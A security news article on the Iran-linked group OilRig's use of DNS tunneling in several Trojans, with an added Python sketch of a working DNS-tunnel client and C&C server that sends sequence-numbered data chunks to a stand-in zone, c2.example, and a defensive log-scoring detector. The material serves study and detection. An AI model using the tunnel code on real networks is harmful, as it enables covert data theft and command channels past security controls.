Iran-linked cyber-espionage group OilRig is making broad use of DNS tunneling across its tools portfolio, Palo Alto Networks security researchers reveal.
Active since at least 2014 and believed to have ties to the Iranian government, the group has mainly targeted the financial, government, energy, telecoms, and chemical sectors in the Middle East.
Over the years it has relied on a variety of tools to conduct attacks, but many of its Trojans use DNS tunneling to communicate with the command and control (C&C) server, a clear sign that this is the group's preferred communication channel.
Analysis of the technique shows that, in all cases, the queried subdomains contain a randomly generated value to avoid cached responses; that an initial handshake is normally used to obtain a unique system identifier; that A, AAAA, or TXT query types are used, which limits how much data the C&C can send back to the Trojan in each response; and that all of the protocols generate a large number of DNS queries.
The researchers also noticed that hardcoded IP addresses are used to signal the start and stop of data transfers, and that sequence numbers are included when uploading data so that the C&C can reassemble it in the correct order.
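To make those mechanics concrete, here is an added Python sketch (written for this page; it is not OilRig's code and not from the Palo Alto Networks research) of a generic tunnel built from exactly the pieces listed above. The zone c2.example, the 203.0.113.x marker addresses, the label layout and the hostname-derived identifier are all assumptions.

```python
"""Added illustration of the tunnel framing the article describes (random cache-
busting label, handshake, sequence-numbered upload, hardcoded marker IPs, per-
record-type downlink cap). Domain, IPs and layout are hypothetical, not any
OilRig tool's real format."""
import base64
import hashlib
import os

DOMAIN = "c2.example"        # hypothetical attacker-controlled zone
START_IP = "203.0.113.1"     # hypothetical marker: handshake accepted, begin upload
ACK_IP = "203.0.113.2"       # hypothetical marker: chunk stored
STOP_IP = "203.0.113.3"      # hypothetical marker: upload complete and reassembled
RESPONSE_CAPACITY = {"A": 4, "AAAA": 16, "TXT": 255}   # payload bytes per answer

def _b32(data: bytes) -> str:
    # Unpadded lowercase base32 uses only [a-z2-7], so it is legal in a DNS label.
    return base64.b32encode(data).decode().rstrip("=").lower()

def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))

def _nonce() -> str:
    # Fresh random label per query so no resolver can answer from cache.
    return _b32(os.urandom(3))

def system_id(hostname: str) -> str:
    # 16-bit identifier derived from the hostname (hypothetical derivation).
    return hashlib.sha256(hostname.encode()).hexdigest()[:4]

def handshake_query(hostname: str) -> str:
    """Client: register the system ID and hostname with the C&C."""
    return f"{_nonce()}.h.{system_id(hostname)}.{_b32(hostname.encode())}.{DOMAIN}"

def upload_queries(sid: str, payload: bytes, chunk: int = 30) -> list:
    """Client: one sequence-numbered query per chunk, then an end-of-upload query.
    30 raw bytes become 48 base32 characters, under the 63-character label limit."""
    names = [f"{_nonce()}.d.{sid}.{seq:04x}.{_b32(payload[off:off + chunk])}.{DOMAIN}"
             for seq, off in enumerate(range(0, len(payload), chunk))]
    names.append(f"{_nonce()}.e.{sid}.{DOMAIN}")
    return names

class C2Server:
    """Server: buffers chunks by sequence number and rebuilds the upload in order
    whatever the arrival order; every answer is one of the marker IPs."""
    def __init__(self):
        self.hosts = {}      # sid -> hostname
        self.pending = {}    # sid -> {seq: chunk bytes}
        self.uploads = {}    # sid -> list of completed payloads

    def answer(self, qname: str) -> str:
        if not qname.endswith("." + DOMAIN):
            return "0.0.0.0"
        labels = qname[:-len(DOMAIN) - 1].split(".")[1:]   # drop the nonce
        if len(labels) < 2:
            return "0.0.0.0"
        kind, sid = labels[0], labels[1]
        if kind == "h" and len(labels) == 3:
            self.hosts[sid] = _unb32(labels[2]).decode()
            self.pending[sid] = {}
            return START_IP
        if kind == "d" and len(labels) == 4 and sid in self.pending:
            self.pending[sid][int(labels[2], 16)] = _unb32(labels[3])
            return ACK_IP
        if kind == "e" and sid in self.pending:
            parts = self.pending.pop(sid)
            if sorted(parts) != list(range(len(parts))):
                return "0.0.0.0"   # a sequence number is missing: discard the upload
            self.uploads.setdefault(sid, []).append(b"".join(parts[i] for i in range(len(parts))))
            return STOP_IP
        return "0.0.0.0"

def downlink_records(command: bytes, rtype: str) -> list:
    """Server: split a command into answer records. An A answer carries 4 bytes,
    AAAA 16 and TXT up to 255, so the record type caps each round trip. The last
    record is NUL-padded; a real tool would signal the command length separately."""
    cap = RESPONSE_CAPACITY[rtype]
    records = []
    for off in range(0, len(command), cap):
        piece = command[off:off + cap]
        if rtype == "A":
            records.append(".".join(str(b) for b in piece.ljust(4, b"\0")))
        elif rtype == "AAAA":
            p = piece.ljust(16, b"\0")
            records.append(":".join(f"{p[i]:02x}{p[i + 1]:02x}" for i in range(0, 16, 2)))
        else:
            records.append(base64.b64encode(piece).decode())
    return records

if __name__ == "__main__":
    import random
    server = C2Server()
    sid = system_id("WORKSTATION-7")
    print("handshake ->", server.answer(handshake_query("WORKSTATION-7")))
    names = upload_queries(sid, b"secret document contents " * 4)
    chunks = names[:-1]
    random.shuffle(chunks)               # out-of-order arrival is handled by the seq numbers
    for q in chunks:
        server.answer(q)
    print("end ->", server.answer(names[-1]), server.uploads[sid][0][:25])
    for rtype in ("A", "AAAA", "TXT"):
        print(rtype, "answers needed for a 100-byte command:", len(downlink_records(b"x" * 100, rtype)))
```

Running it shows why the researchers point at query volume: uploading 100 bytes takes a handshake, four data queries and an end marker, and a 100-byte command sent back over A records needs 25 round trips against one over TXT, because each A answer carries only four bytes. The sequence numbers, not the arrival order, drive reassembly, and a missing chunk makes the server discard the transfer rather than splice across a gap.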
OilRig has used DNS tunneling for C&C communication since at least 2016; Trojans from the group that rely on it include Helminth, ISMAgent, ALMA Communicator, BONDUPDATER, and QUADAGENT.
All of these tools resolve specially crafted subdomains to send data to the C&C, but the protocols differ in many ways, the researchers say: the structure of the subdomains queried, of the data the Trojans receive, and of the subdomains used to transmit data all vary from tool to tool.
The encoding used to represent the data also differs, as does the manner in which the Trojans issue DNS queries, Palo Alto Networks reveals.
The different variants of Helminth observed over the years (portable executable and PowerShell) both use DNS A queries, but the attackers can change the structure of the generated subdomains to make them visually different and evade detection.
Used in various targeted attacks, ISMAgent calls the DnsQuery_A API function to issue DNS AAAA requests for custom subdomains. The Trojan first issues a beacon to tell the server it is ready to transmit, then sends the encoded data to the C&C.
OilRig was observed using two different variants of the ALMA Communicator as the payload, each employing a different domain structure. Differences between the two also include the information sent to the server and the formatting of the data within the DNS tunneling protocol.
The hacking group has used multiple variants of the BONDUPDATER tool in attacks since at least mid-2017. Early samples issued DNS A queries through the GetHostAddresses method of the System.Net.Dns class, while later variants build their own DNS A and TXT queries and send them over UDP using the System.Net.Sockets.UdpClient class.
The QUADAGENT Trojan uses AAAA queries to transmit and receive data via DNS tunneling, but a different method is used to issue queries depending on the Windows version.
“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices. One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,” Palo Alto Networks concludes.
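The drawback Palo Alto Networks points to is also the detection opportunity. The following added Python example (not from the article or from Palo Alto Networks) scores a DNS query log per client and zone on query volume, on the share of never-repeated subdomains that the random cache-busting value produces, and on label entropy. The log format, the constructed sample traffic and the thresholds are assumptions to be tuned against a real baseline, and the entropy and uniqueness heuristics go beyond the volume indicator the article itself mentions.

```python
"""Added detection example, not from the article or Palo Alto Networks: scores
DNS query logs for the traits the article lists (many queries to one zone,
every subdomain unique because of the random value, high-entropy labels).
Log format, sample data and thresholds are constructed assumptions."""
import math
import random
import re
from collections import defaultdict

# Assumed log line format: "<epoch> <client-ip> <qtype> <qname>"
LOG_RE = re.compile(r"^(?P<ts>\d+) (?P<client>[\d.]+) (?P<qtype>[A-Z]+) (?P<qname>\S+)$")
BASE32 = "abcdefghijklmnopqrstuvwxyz234567"

def registered_domain(qname: str) -> str:
    # Naive: last two labels. Production code should use the public suffix list.
    return ".".join(qname.rstrip(".").split(".")[-2:])

def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def build_sample_log(seed: int = 7) -> list:
    """Constructed log: eight hosts browsing a few benign names, plus one host
    pushing 150 tunnel-style queries with random nonce and data labels."""
    rng = random.Random(seed)
    benign = ["www.example.com", "mail.example.com", "cdn.example.net", "login.example.org"]
    lines = [f"{1000 + i} 10.0.0.{rng.randint(2, 9)} A {rng.choice(benign)}" for i in range(120)]
    for i in range(150):
        nonce = "".join(rng.choice(BASE32) for _ in range(5))
        data = "".join(rng.choice(BASE32) for _ in range(48))
        qtype = rng.choice(["A", "AAAA", "TXT"])
        lines.append(f"{1000 + i} 10.0.0.5 {qtype} {nonce}.d.1a2b.{i:04x}.{data}.c2.example")
    return lines

def score_log(lines, min_queries=50, min_unique_ratio=0.9, min_entropy=3.5):
    """Aggregate per (client, zone) and return the pairs over every threshold.
    Thresholds are assumptions; tune them against your own baseline."""
    stats = defaultdict(lambda: {"n": 0, "names": set(), "entropy": 0.0, "txt_aaaa": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        zone = registered_domain(m["qname"])
        st = stats[(m["client"], zone)]
        st["n"] += 1
        st["names"].add(m["qname"])
        sub = m["qname"][:-len(zone) - 1] if m["qname"] != zone else ""
        st["entropy"] += shannon_entropy(sub.replace(".", ""))
        st["txt_aaaa"] += m["qtype"] in ("AAAA", "TXT")
    findings = []
    for (client, zone), st in stats.items():
        unique_ratio = len(st["names"]) / st["n"]
        avg_entropy = st["entropy"] / st["n"]
        if st["n"] >= min_queries and unique_ratio >= min_unique_ratio and avg_entropy >= min_entropy:
            findings.append({"client": client, "zone": zone, "queries": st["n"],
                             "unique_ratio": round(unique_ratio, 2),
                             "avg_label_entropy": round(avg_entropy, 2),
                             "aaaa_txt_queries": st["txt_aaaa"]})
    return sorted(findings, key=lambda f: -f["queries"])

if __name__ == "__main__":
    for finding in score_log(build_sample_log()):
        print(finding)
```

The sample run flags only the host sending 150 queries to c2.example, each with a unique, high-entropy name, while the benign browsing stays far below every threshold. Against real resolver logs, replace the two-label zone heuristic with the public suffix list and bucket by time window, so that a burst in one hour is not diluted by a quiet day.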
Related: Iran-Linked Hackers Use Just-in-Time Creation of Weaponized Attack Docs

More from Ionut Arghire